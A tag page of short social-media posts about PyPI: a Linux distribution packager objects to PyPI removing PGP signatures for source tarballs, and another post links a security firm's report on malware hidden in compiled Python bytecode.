Skip to main content

Search

Items tagged with: pypi


It seems we'll have a lot of "fun" with the #PyPi decision to remove signatures for sdist tarballs (https://blog.pypi.org/posts/2023-05-23-removing-pgp/) going forward.

To scream into the void: Yes, PyPi, someone was using those signatures. Distro package maintainers secured user supply chains with it!

I'm not looking forward to asking dozens of upstreams to host their signatures elsewhere (just stumbled across one case). Meanwhile reproducibility is now broken for those packages.

#ArchLinux #packagerlife #Python


ReversingLabs has identified a novel attack on #PyPI using compiled #Python code to evade detection in the #SupplyChain: https://www.reversinglabs.com/blog/when-python-bytecode-bites-back-who-checks-the-contents-of-compiled-python-files

Lo, thar be cookies on this site to keep track of your login. By clicking 'okay', you are CONSENTING to this.